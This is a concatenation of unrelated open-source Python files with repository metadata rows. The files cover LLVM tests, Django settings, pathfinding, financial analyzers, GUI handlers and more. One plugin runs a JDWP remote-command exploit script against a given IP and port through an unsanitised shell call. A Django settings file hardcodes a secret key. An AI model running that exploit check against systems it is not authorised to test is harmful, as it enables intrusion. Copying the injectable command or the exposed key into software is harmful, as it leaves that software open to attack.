@qy.python(v)
def _(v_py):
total[0] += v_py
assert_almost_equal(total[0] / count, 0.5, places = 1)
def test_qy_random_int():
"""
Test the qy-LLVM random_int() construct.
"""
count = 32
values = []
@emit_and_execute()
def _():
@qy.for_(count)
def _(_):
v = qy.random_int(2)
@qy.python(v)
def _(v_py):
values.append(v_py)
assert_true(len(filter(None, values)) > 8)
assert_true(len(filter(None, values)) < 24)
def test_qy_select():
"""
Test the select() LLVM construct without arguments.
"""
result = [None, None]
@emit_and_execute()
def _():
v0 = qy.select(True, 3, 4)
v1 = qy.select(False, 3, 4)
@qy.python(v0, v1)
def _(v0_py, v1_py):
result[0] = v0_py
result[1] = v1_py
assert_equal(result[0], 3)
assert_equal(result[1], 4)
def test_qy_is_nan():
"""
Test LLVM real-value is_nan property.
"""
@emit_and_execute()
def _():
a = qy.value_from_any(-0.000124992188151).is_nan
b = qy.value_from_any(numpy.nan).is_nan
@qy.python(a, b)
def _(a_py, b_py):
assert_false(a_py)
assert_true(b_py)
def test_qy_log():
"""
Test the LLVM log() intrinsic wrapper.
"""
@emit_and_execute()
def _():
v0 = qy.log(math.e)
@qy.python(v0)
def _(v0_py):
assert_equal(v0_py, 1.0)
def test_qy_log1p():
"""
Test the LLVM log1p() construct.
"""
@emit_and_execute()
def _():
v0 = qy.log1p(math.e - 1.0)
@qy.python(v0)
def _(v0_py):
assert_equal(v0_py, 1.0)
def test_qy_exp():
"""
Test the LLVM exp() intrinsic wrapper.
"""
@emit_and_execute()
def _():
v0 = qy.exp(1.0)
@qy.python(v0)
def _(v0_py):
assert_equal(v0_py, math.e)
def test_qy_real_neg():
"""
Test the floating-point negation operation.
"""
@emit_and_execute()
def _():
x = qy.value_from_any(3)
y = qy.value_from_any(-5)
@qy.python(-x, -y)
def _(a_py, b_py):
assert_equal(a_py, -3)
assert_equal(b_py, 5)
def test_qy_integer_mod():
"""
Test the integer modulo operation.
"""
@emit_and_execute()
def _():
x = qy.value_from_any(3)
y = qy.value_from_any(5)
z = qy.value_from_any(-2)
@qy.python(x % y, y % z, z % y)
def _(a_py, b_py, c_py):
assert_equal(a_py, 3)
assert_equal(b_py, 2)
assert_equal(c_py, -2)
| mit | 2,407,731,293,992,260,000 | 18.449115 | 74 | 0.475145 | false | 3.366909 | true | false | false |
blstream/ut-arena | ut_arena_py_api/ut_arena/settings.py | 1 | 3193 | """
Django settings for ut_arena_py_api project.
Generated by 'django-admin startproject' using Django 1.9.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '!2stj*=!93mhvadu7moo(^ak6(jkl&(y*%q59l=7qj(5+n*-r)'
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'apps.utarena',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'ut_arena.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'ut_arena.wsgi.application'
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
# Rest settings
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
),
'PAGE_SIZE': 10,
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
)
}
| apache-2.0 | 7,903,634,078,388,148,000 | 26.765217 | 91 | 0.68932 | false | 3.551724 | false | false | false |
brean/python-pathfinding | pathfinding/finder/finder.py | 1 | 6586 | # -*- coding: utf-8 -*-
import heapq # used for the so colled "open list" that stores known nodes
import time # for time limitation
from pathfinding.core.util import SQRT2
from pathfinding.core.diagonal_movement import DiagonalMovement
# max. amount of tries we iterate until we abort the search
MAX_RUNS = float('inf')
# max. time after we until we abort the search (in seconds)
TIME_LIMIT = float('inf')
# used for backtrace of bi-directional A*
BY_START = 1
BY_END = 2
class ExecutionTimeException(Exception):
def __init__(self, message):
super(ExecutionTimeException, self).__init__(message)
class ExecutionRunsException(Exception):
def __init__(self, message):
super(ExecutionRunsException, self).__init__(message)
class Finder(object):
def __init__(self, heuristic=None, weight=1,
diagonal_movement=DiagonalMovement.never,
weighted=True,
time_limit=TIME_LIMIT,
max_runs=MAX_RUNS):
"""
find shortest path
:param heuristic: heuristic used to calculate distance of 2 points
(defaults to manhattan)
:param weight: weight for the edges
:param diagonal_movement: if diagonal movement is allowed
(see enum in diagonal_movement)
:param weighted: the algorithm supports weighted nodes
(should be True for A* and Dijkstra)
:param time_limit: max. runtime in seconds
:param max_runs: max. amount of tries until we abort the search
(optional, only if we enter huge grids and have time constrains)
<=0 means there are no constrains and the code might run on any
large map.
"""
self.time_limit = time_limit
self.max_runs = max_runs
self.weighted = weighted
self.diagonal_movement = diagonal_movement
self.weight = weight
self.heuristic = heuristic
def calc_cost(self, node_a, node_b):
"""
get the distance between current node and the neighbor (cost)
"""
if node_b.x - node_a.x == 0 or node_b.y - node_a.y == 0:
# direct neighbor - distance is 1
ng = 1
else:
# not a direct neighbor - diagonal movement
ng = SQRT2
# weight for weighted algorithms
if self.weighted:
ng *= node_b.weight
return node_a.g + ng
def apply_heuristic(self, node_a, node_b, heuristic=None):
"""
helper function to apply heuristic
"""
if not heuristic:
heuristic = self.heuristic
return heuristic(
abs(node_a.x - node_b.x),
abs(node_a.y - node_b.y))
def find_neighbors(self, grid, node, diagonal_movement=None):
'''
find neighbor, same for Djikstra, A*, Bi-A*, IDA*
'''
if not diagonal_movement:
diagonal_movement = self.diagonal_movement
return grid.neighbors(node, diagonal_movement=diagonal_movement)
def keep_running(self):
"""
check, if we run into time or iteration constrains.
:returns: True if we keep running and False if we run into a constraint
"""
if self.runs >= self.max_runs:
raise ExecutionRunsException(
'{} run into barrier of {} iterations without '
'finding the destination'.format(
self.__class__.__name__, self.max_runs))
if time.time() - self.start_time >= self.time_limit:
raise ExecutionTimeException(
'{} took longer than {} seconds, aborting!'.format(
self.__class__.__name__, self.time_limit))
def process_node(self, node, parent, end, open_list, open_value=True):
'''
we check if the given node is path of the path by calculating its
cost and add or remove it from our path
:param node: the node we like to test
(the neighbor in A* or jump-node in JumpPointSearch)
:param parent: the parent node (the current node we like to test)
:param end: the end point to calculate the cost of the path
:param open_list: the list that keeps track of our current path
:param open_value: needed if we like to set the open list to something
else than True (used for bi-directional algorithms)
'''
# calculate cost from current node (parent) to the next node (neighbor)
ng = self.calc_cost(parent, node)
if not node.opened or ng < node.g:
node.g = ng
node.h = node.h or \
self.apply_heuristic(node, end) * self.weight
# f is the estimated total cost from start to goal
node.f = node.g + node.h
node.parent = parent
if not node.opened:
heapq.heappush(open_list, node)
node.opened = open_value
else:
# the node can be reached with smaller cost.
# Since its f value has been updated, we have to
# update its position in the open list
open_list.remove(node)
heapq.heappush(open_list, node)
def check_neighbors(self, start, end, grid, open_list,
open_value=True, backtrace_by=None):
"""
find next path segment based on given node
(or return path if we found the end)
:param start: start node
:param end: end node
:param grid: grid that stores all possible steps/tiles as 2D-list
:param open_list: stores nodes that will be processed next
"""
raise NotImplementedError(
'Please implement check_neighbors in your finder')
def find_path(self, start, end, grid):
"""
find a path from start to end node on grid by iterating over
all neighbors of a node (see check_neighbors)
:param start: start node
:param end: end node
:param grid: grid that stores all possible steps/tiles as 2D-list
:return:
"""
self.start_time = time.time() # execution time limitation
self.runs = 0 # count number of iterations
start.opened = True
open_list = [start]
while len(open_list) > 0:
self.runs += 1
self.keep_running()
path = self.check_neighbors(start, end, grid, open_list)
if path:
return path, self.runs
# failed to find path
return [], self.runs
| mit | -7,266,928,208,447,150,000 | 35.588889 | 79 | 0.58928 | false | 4.23537 | false | false | false |
django-id/website | app_author/models.py | 1 | 2195 | from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
# CUSTOM FILE SIZE VALIDATOR
def validate_image(fieldfile_obj):
"""
Limit image size upload
"""
filesize = fieldfile_obj.file.size
megabyte_limit = 0.5
if filesize > megabyte_limit*1024*1024:
raise ValidationError("Max file size is %sMB" % str(megabyte_limit))
class Profile(models.Model):
"""
Author Model
"""
user = models.OneToOneField(
User,
on_delete=models.CASCADE
)
profile_picture = models.ImageField(
upload_to='images/%Y/%m/%d',
validators=[validate_image],
blank=True,
null=True
)
profile_name = models.CharField(
verbose_name='Name',
null=True,
blank=True,
max_length=50
)
profile_email = models.EmailField(
verbose_name='Email Address',
null=True,
blank=True
)
profile_location = models.CharField(
verbose_name='Origin/City',
null=True,
blank=True,
max_length=50
)
profile_github = models.URLField(
verbose_name='Github URL',
null=True,
blank=True
)
slug = models.SlugField()
is_created = models.DateTimeField(
null=True,
blank=True
)
is_moderator = models.BooleanField(
default=False,
)
def __str__(self):
return str(self.user)
def save(self, **kwargs):
if not self.slug:
from djangoid.utils import get_unique_slug
self.slug = get_unique_slug(instance=self, field='profile_name')
super(Profile, self).save(**kwargs)
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
"""
Automatically Create User when Login
"""
if created:
Profile.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_user_profile(sender, instance, **kwargs):
"""
Automatically Create User when Login
"""
instance.profile.save()
| mit | -1,107,724,903,978,328,600 | 21.397959 | 76 | 0.618223 | false | 3.933692 | false | false | false |
mhl/mysociety-cvs | sitestats/pylib/sitestats/backports/contrib/auth/middleware.py | 1 | 2933 | from django.contrib import auth
from django.core.exceptions import ImproperlyConfigured
class RemoteUserMiddleware(object):
"""
Middleware for utilizing web-server-provided authentication.
If request.user is not authenticated, then this middleware attempts to
authenticate the username passed in the ``REMOTE_USER`` request header.
If authentication is successful, the user is automatically logged in to
persist the user in the session.
The header used is configurable and defaults to ``REMOTE_USER``. Subclass
this class and change the ``header`` attribute if you need to use a
different header.
"""
# Name of request header to grab username from. This will be the key as
# used in the request.META dictionary, i.e. the normalization of headers to
# all uppercase and the addition of "HTTP_" prefix apply.
header = "REMOTE_USER"
def process_request(self, request):
# AuthenticationMiddleware is required so that request.user exists.
if not hasattr(request, 'user'):
raise ImproperlyConfigured(
"The Django remote user auth middleware requires the"
" authentication middleware to be installed. Edit your"
" MIDDLEWARE_CLASSES setting to insert"
" 'django.contrib.auth.middleware.AuthenticationMiddleware'"
" before the RemoteUserMiddleware class.")
try:
username = request.META[self.header]
except KeyError:
# If specified header doesn't exist then return (leaving
# request.user set to AnonymousUser by the
# AuthenticationMiddleware).
return
# If the user is already authenticated and that user is the user we are
# getting passed in the headers, then the correct user is already
# persisted in the session and we don't need to continue.
if request.user.is_authenticated():
if request.user.username == self.clean_username(username, request):
return
# We are seeing this user for the first time in this session, attempt
# to authenticate the user.
user = auth.authenticate(remote_user=username)
if user:
# User is valid. Set request.user and persist user in the session
# by logging the user in.
request.user = user
auth.login(request, user)
def clean_username(self, username, request):
"""
Allows the backend to clean the username, if the backend defines a
clean_username method.
"""
backend_str = request.session[auth.BACKEND_SESSION_KEY]
backend = auth.load_backend(backend_str)
try:
username = backend.clean_username(username)
except AttributeError: # Backend has no clean_username method.
pass
return username
| agpl-3.0 | -5,813,389,405,922,956,000 | 42.776119 | 79 | 0.650869 | false | 5.030875 | false | false | false |
perfidia/seleshot | doc/gen_api.py | 1 | 3756 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import os
import sys
import string
sys.path.append('../src')
import seleshot
TEMPLATE = """===
API
===
"""
OUTPUT = os.path.join("_static", "api.txt")
# from http://legacy.python.org/dev/peps/pep-0257/
def trim(docstring):
if not docstring:
return ''
# Convert tabs to spaces (following the normal Python rules)
# and split into a list of lines:
lines = docstring.expandtabs().splitlines()
# Determine minimum indentation (first line doesn't count):
indent = sys.maxint
for line in lines[1:]:
stripped = line.lstrip()
if stripped:
indent = min(indent, len(line) - len(stripped))
# Remove indentation (first line is special):
trimmed = [lines[0].strip()]
if indent < sys.maxint:
for line in lines[1:]:
trimmed.append(line[indent:].rstrip())
# Strip off trailing and leading blank lines:
while trimmed and not trimmed[-1]:
trimmed.pop()
while trimmed and not trimmed[0]:
trimmed.pop(0)
# Return a single string:
return '\n'.join(trimmed)
def fmt(doc, indent = 8):
return "\n".join([" " * indent + i for i in trim(doc).split("\n")])
if __name__ == '__main__':
print "Generating...",
s = seleshot.create()
s.driver.get("http://example.com")
i = s.get_screen()
fd = open(OUTPUT, "w")
###########################################################################
fd.write(TEMPLATE)
fd.write(" " * 0 + ".. autofunction:: seleshot.create")
fd.write("\n\n")
fd.write(" " * 0 + ".. class:: ScreenShot(object):")
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: get_screen(self, url = None):\n\n")
fd.write(fmt(s.get_screen.__doc__))
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: close(self):\n\n")
fd.write(fmt(s.close.__doc__))
fd.write("\n\n")
fd.write(" " * 0 + ".. class:: ImageContainer(object):\n\n")
fd.write(fmt(i.__doc__))
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: cut_element(self, id = None, xpath = None):\n\n")
fd.write(fmt(i.cut_element.__doc__))
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: cut_area(self, x = 0, y = 0, height = None, width = None):\n\n")
fd.write(fmt(i.cut_area.__doc__))
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: draw_dot(self, id = None, xpath = None, coordinates = None, padding = 0, color = None, size = None):\n\n")
fd.write(fmt(i.draw_dot.__doc__))
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: draw_frame(self, id = None, xpath = None, coordinates = None, padding = None, color = None, size = None):\n\n")
fd.write(fmt(i.draw_frame.__doc__))
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: draw_image(self, id = None, xpath = None, coordinates = None, position = Position.MIDDLE, padding = (0, 0), filename = None, image = None):\n\n")
fd.write(fmt(i.draw_image.__doc__))
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: draw_zoom(self, id = None, xpath = None, coordinates = None, position = Position.MIDDLE, padding = (0, 0), zoom = None):\n\n")
fd.write(fmt(i.draw_zoom.__doc__))
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: draw_blur(self, id = None, xpath = None):\n\n")
fd.write(fmt(i.draw_blur.__doc__))
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: save(self, filename):\n\n")
fd.write(fmt(i.save.__doc__))
fd.write("\n\n")
fd.write(" " * 4 + ".. function:: is_cut(self):\n\n")
fd.write(fmt(i.is_cut.__doc__))
fd.write("\n\n")
##########################################################################
fd.close()
s.close()
print "done"
| mit | 3,779,118,023,028,133,400 | 28.809524 | 183 | 0.536741 | false | 3.224034 | false | false | false |
nanshihui/PocCollect | component/JDWP/JDWPvul.py | 1 | 2106 | #!/usr/bin/env python
# encoding: utf-8
from t import T
import os
import platform
import subprocess
import signal
import time
import requests,urllib2,json,urlparse
class TimeoutError(Exception):
pass
def command(cmd, timeout=60):
"""Run command and return the output
cmd - the command to run
timeout - max seconds to wait for
"""
is_linux = platform.system() == 'Linux'
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid if is_linux else None)
if timeout==0:
return p.stdout.read()
t_beginning = time.time()
seconds_passed = 0
while True:
if p.poll() is not None:
break
seconds_passed = time.time() - t_beginning
if timeout and seconds_passed > timeout:
if is_linux:
os.killpg(p.pid, signal.SIGTERM)
else:
p.terminate()
raise TimeoutError(cmd, timeout)
time.sleep(0.1)
return p.stdout.read()
class P(T):
def __init__(self):
T.__init__(self)
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
result = {}
result['result']=False
usecommand='python '+os.path.split(os.path.realpath(__file__))[0]+'/script/jdwpshellifier.py -t '+ip+' -p '+port
try:
print usecommand
msgresult = command(usecommand, timeout=40)
print msgresult
if 'Command successfully executed' in msgresult:
result['result']=True
result['VerifyInfo'] = {}
result['VerifyInfo']['type']='Java Debug Wire Protocol vul'
result['VerifyInfo']['URL'] =ip+':'+port
result['VerifyInfo']['payload']='Java Debug Wire Protocol poc'
result['VerifyInfo']['result'] =msgresult
else:
pass
except Exception,e:
print e.text
finally:
return result
if __name__ == '__main__':
print P().verify(ip='120.24.243.216',port='8001')
| mit | -8,082,791,348,985,507,000 | 31.4 | 135 | 0.57265 | false | 4.05 | false | false | false |
glmcdona/meddle | examples/example_deviceiocontrol/processes.py | 1 | 1377 | from process_base import *
from targets import *
import subprocess
import os
class ProcessDeviceIo(ProcessBase):
def __init__(self, Controller, crashdump_folder, breakpoint_handler, pid, ph, unique_identifier, verbose, logger):
# Specific options
self.path_to_exe = b"C:\\Windows\\System32\\notepad.exe"
self.command_line = b"notepad.exe"
self.logger = logger
# Initialize
self.initialize(Controller, self.__class__.__name__, crashdump_folder, breakpoint_handler, pid, ph, unique_identifier, verbose)
def on_debugger_attached(self, Engine):
# Set the types
self.Engine = Engine
self.types = meddle_types(Engine)
# Add the targets
Engine.AddTarget(Target_Handles)
Engine.AddTarget(Target_DeviceIoControl)
# Handle process loaded
Engine.HandleProcessLoaded()
# Start an auto-it script
try:
subprocess.Popen(['autoit3.exe', os.path.join(os.path.dirname(__file__), "..", "autoit", "notepad_print.au3"), str(self.pid), ">nul"], shell=True)
except:
print "Warning: autoit3.exe not found on path. Please install it and add it to path to increase the attack surface."
# Resume the process that we created suspended. This is called just after the debugger has been attached.
if self.start_th >= 0:
windll.kernel32.ResumeThread(self.start_th);
def log_csv(self, fields):
self.logger.log_event(fields)
| mit | 4,168,101,267,918,378,500 | 28.319149 | 149 | 0.713145 | false | 3.326087 | false | false | false |
building39/nebula2 | scripts/cdmi_explorer/CDMIMain/handlers.py | 1 | 2951 | '''
Created on Jun 9, 2013
@author: mmartin
'''
import sys
from gi.repository import Gtk
from CDMIAbout import CDMIAbout
from CDMIConnect import CDMIConnect
from CDMIHelp import CDMIHelp
class Handlers(object):
'''
classdocs
'''
def __init__(self, session):
self.session = session
def onAbout(self, *args):
CDMIAbout(self.session)
def onConnect(self, *args):
CDMIConnect(self.session)
def onDeleteWindow(self, *args):
self.onQuit(*args)
def onHelp(self, *args):
CDMIHelp(self.session)
def onQuit(self, *args):
Gtk.main_quit()
def onCDMIRowCollapsed(self, *args):
treeview = args[0]
treeiter = args[1]
treepath = args[2]
model = treeview.get_model()
data = self.session.GET(model[treeiter][1])
self.session.get_children(treeview, treepath, data)
self.session.display_cdmi_data(data)
def onCDMIRowExpanded(self, *args):
treeview = args[0]
treeiter = args[1]
treepath = args[2]
rowname = self._squash_slashes(self.session.cdmimodel.get_value(treeiter, 1))
data = self.session.GET(rowname)
treeiter = self.session.cdmimodel.get_iter(treepath)
model = treeview.get_model()
prefix = rowname
if model.iter_has_child(treeiter):
num_children = model.iter_n_children(treeiter)
for i in range(num_children):
if not data:
break
child = data['children'][i]
childpath = self._squash_slashes('%s/%s' % (prefix, child))
childdata = self.session.GET(childpath)
childiter = model.iter_nth_child(treeiter, i)
self.session.get_children(treeview,
model.get_path(childiter),
childdata)
self.session.display_cdmi_data(data)
return
def onCDMIRowActivated(self, *args):
'''
Display the CDMI data for the selected row.
'''
treeview = args[0]
treepath = args[1]
_column = args[2]
model = treeview.get_model()
treeiter = model.get_iter(treepath)
data = self.session.GET(model[treeiter][1])
self.session.get_children(treeview, treepath, data)
self.session.display_cdmi_data(data)
def onSelectCursorRow(self, *args):
print 'onSelectCursorRow args: %s' % args
sys.stdout.flush()
def onCursorChanged(self, *args):
print 'onCursorChanged args: %s' % args
sys.stdout.flush()
def _squash_slashes(self, S):
T = ""
for i in range(len(S)):
try:
if S[i] == '/' and S[i+1] == '/':
i += 1
continue
T = T + S[i]
except:
T = T + S[i]
return T
| apache-2.0 | -8,973,868,036,584,532,000 | 27.375 | 85 | 0.54795 | false | 3.634236 | false | false | false |
cliburn/flow | src/plugins/statistics/summary.py | 1 | 1069 | """Provide summary statistics on data."""
from plugin import Statistics
from numpy import min, max, mean, median, std
class Summary(Statistics):
"""Plugin to display summary statistics"""
name = "Summary"
def Main(self, model):
"""Calculate summary statistics"""
self.model = model
fields = self.model.GetCurrentData().getAttr('fields')
data = self.model.GetCurrentData()[:]
low = list(min(data, axis=0))
high = list(max(data, axis=0))
mu = list(mean(data, axis=0))
med = list(median(data))
sig = list(std(data, axis=0))
self.model.NewGroup('Summary statistics')
self.model.hdf5.createArray(self.model.current_group, 'min', low)
self.model.hdf5.createArray(self.model.current_group, 'max', high)
self.model.hdf5.createArray(self.model.current_group, 'mean', mu)
self.model.hdf5.createArray(self.model.current_group, 'median', med)
self.model.hdf5.createArray(self.model.current_group, 'stdev', sig)
self.model.update()
| gpl-3.0 | -8,669,594,832,415,969,000 | 41.76 | 76 | 0.63985 | false | 3.636054 | false | false | false |
mementum/backtrader | backtrader/analyzers/logreturnsrolling.py | 1 | 5020 | #!/usr/bin/env python
# -*- coding: utf-8; py-indent-offset:4 -*-
###############################################################################
#
# Copyright (C) 2015-2020 Daniel Rodriguez
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import collections
import math
import backtrader as bt
__all__ = ['LogReturnsRolling']
class LogReturnsRolling(bt.TimeFrameAnalyzerBase):
'''This analyzer calculates rolling returns for a given timeframe and
compression
Params:
- ``timeframe`` (default: ``None``)
If ``None`` the ``timeframe`` of the 1st data in the system will be
used
Pass ``TimeFrame.NoTimeFrame`` to consider the entire dataset with no
time constraints
- ``compression`` (default: ``None``)
Only used for sub-day timeframes to for example work on an hourly
timeframe by specifying "TimeFrame.Minutes" and 60 as compression
If ``None`` then the compression of the 1st data of the system will be
used
- ``data`` (default: ``None``)
Reference asset to track instead of the portfolio value.
.. note:: this data must have been added to a ``cerebro`` instance with
``addata``, ``resampledata`` or ``replaydata``
- ``firstopen`` (default: ``True``)
When tracking the returns of a ``data`` the following is done when
crossing a timeframe boundary, for example ``Years``:
- Last ``close`` of previous year is used as the reference price to
see the return in the current year
The problem is the 1st calculation, because the data has** no
previous** closing price. As such and when this parameter is ``True``
the *opening* price will be used for the 1st calculation.
This requires the data feed to have an ``open`` price (for ``close``
the standard [0] notation will be used without reference to a field
price)
Else the initial close will be used.
- ``fund`` (default: ``None``)
If ``None`` the actual mode of the broker (fundmode - True/False) will
be autodetected to decide if the returns are based on the total net
asset value or on the fund value. See ``set_fundmode`` in the broker
documentation
Set it to ``True`` or ``False`` for a specific behavior
Methods:
- get_analysis
Returns a dictionary with returns as values and the datetime points for
each return as keys
'''
params = (
('data', None),
('firstopen', True),
('fund', None),
)
def start(self):
super(LogReturnsRolling, self).start()
if self.p.fund is None:
self._fundmode = self.strategy.broker.fundmode
else:
self._fundmode = self.p.fund
self._values = collections.deque([float('Nan')] * self.compression,
maxlen=self.compression)
if self.p.data is None:
# keep the initial portfolio value if not tracing a data
if not self._fundmode:
self._lastvalue = self.strategy.broker.getvalue()
else:
self._lastvalue = self.strategy.broker.fundvalue
def notify_fund(self, cash, value, fundvalue, shares):
if not self._fundmode:
self._value = value if self.p.data is None else self.p.data[0]
else:
self._value = fundvalue if self.p.data is None else self.p.data[0]
def _on_dt_over(self):
# next is called in a new timeframe period
if self.p.data is None or len(self.p.data) > 1:
# Not tracking a data feed or data feed has data already
vst = self._lastvalue # update value_start to last
else:
# The 1st tick has no previous reference, use the opening price
vst = self.p.data.open[0] if self.p.firstopen else self.p.data[0]
self._values.append(vst) # push values backwards (and out)
def next(self):
# Calculate the return
super(LogReturnsRolling, self).next()
self.rets[self.dtkey] = math.log(self._value / self._values[0])
self._lastvalue = self._value # keep last value
| gpl-3.0 | -3,908,883,812,775,189,000 | 34.857143 | 79 | 0.60996 | false | 4.27234 | false | false | false |
codilime/cloudify-agent | cloudify_agent/installer/config/decorators.py | 1 | 5377 | #########
# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
from functools import wraps
from cloudify import ctx
from cloudify import context
from cloudify_agent.installer.config.attributes import AGENT_ATTRIBUTES
def attribute(name):
def decorator(function):
@wraps(function)
def wrapper(cloudify_agent):
# if the property was given in the invocation, use it.
# inputs are first in precedence order
if _update_agent_property(name,
props=cloudify_agent,
final_props=cloudify_agent):
return
if ctx.type == context.NODE_INSTANCE:
# if the property is inside a runtime property, use it.
# runtime properties are second in precedence order
runtime_properties = ctx.instance.runtime_properties.get(
'cloudify_agent', {})
if _update_agent_property(name,
props=runtime_properties,
final_props=cloudify_agent):
return
# if the property is declared on the node, use it
# node properties are third in precedence order
node_properties = ctx.node.properties.get(
'cloudify_agent', {})
node_properties.update(ctx.node.properties.get(
'agent_config', {}))
if _update_agent_property(name,
props=node_properties,
final_props=cloudify_agent):
return
# if the property is inside the bootstrap context,
# and its value is not None, use it
# bootstrap_context is forth in precedence order
attr = AGENT_ATTRIBUTES.get(name)
if attr is None:
raise RuntimeError('{0} is not an agent attribute'
.format(name))
agent_context = ctx.bootstrap_context.cloudify_agent.\
_cloudify_agent or {}
context_attribute = attr.get('context_attribute', name)
if _update_agent_property(context_attribute,
props=agent_context,
final_props=cloudify_agent,
final_key=name):
return
if _update_agent_property(name,
props=agent_context,
final_props=cloudify_agent):
return
# apply the function itself
ctx.logger.debug('Applying function:{0} on Attribute '
'<{1}>'.format(function.__name__, name))
value = function(cloudify_agent)
if value is not None:
ctx.logger.debug('{0} set by function:{1}'
.format(name, value))
cloudify_agent[name] = value
return
# set default value
default = attr.get('default')
if default is not None:
ctx.logger.debug('{0} set by default value'
.format(name, value))
cloudify_agent[name] = default
return
return wrapper
return decorator
def group(name):
def decorator(group_function):
@wraps(group_function)
def wrapper(cloudify_agent, *args, **kwargs):
# collect all attributes belonging to that group
group_attributes = {}
for attr_name, attr_value in AGENT_ATTRIBUTES.iteritems():
if attr_value.get('group') == name:
group_attributes[attr_name] = attr_value
for group_attr_name in group_attributes.iterkeys():
# iterate and try to set all the attributes of the group as
# defined in the heuristics of @attribute.
@attribute(group_attr_name)
def setter(_):
pass
setter(cloudify_agent)
# when we are done, invoke the group function to
# apply group logic
group_function(cloudify_agent, *args, **kwargs)
return wrapper
return decorator
def _update_agent_property(name, props, final_props, final_key=None):
final_key = final_key or name
extra_props = props.get('extra', {})
if name in extra_props:
final_props[final_key] = extra_props[name]
return True
if name in props:
final_props[final_key] = props[name]
return True
return False
| apache-2.0 | -2,597,727,802,150,284,000 | 36.340278 | 77 | 0.53766 | false | 4.874887 | false | false | false |
liubenyuan/vispy-tutorial | examples/04-tetrahedron.py | 1 | 4445 | # pylint: disable=invalid-name, no-member, unused-argument
""" passing varyings to fragment """
import numpy as np
from vispy import app, gloo
from vispy.util.transforms import translate, perspective, rotate
# note the 'color' and 'v_color' in vertex
vertex = """
uniform mat4 u_model; // Model matrix
uniform mat4 u_view; // View matrix
uniform mat4 u_projection; // Projection matrix
uniform vec4 u_color; // mask color for edge plotting
attribute vec3 a_position;
attribute vec4 a_color;
varying vec4 v_color;
void main()
{
gl_Position = u_projection * u_view * u_model * vec4(a_position, 1.0);
v_color = a_color * u_color;
}
"""
# note the varying 'v_color', it must has the same name as in the vertex.
fragment = """
varying vec4 v_color;
void main()
{
gl_FragColor = v_color;
}
"""
class Canvas(app.Canvas):
""" build canvas class for this demo """
def __init__(self):
""" initialize the canvas """
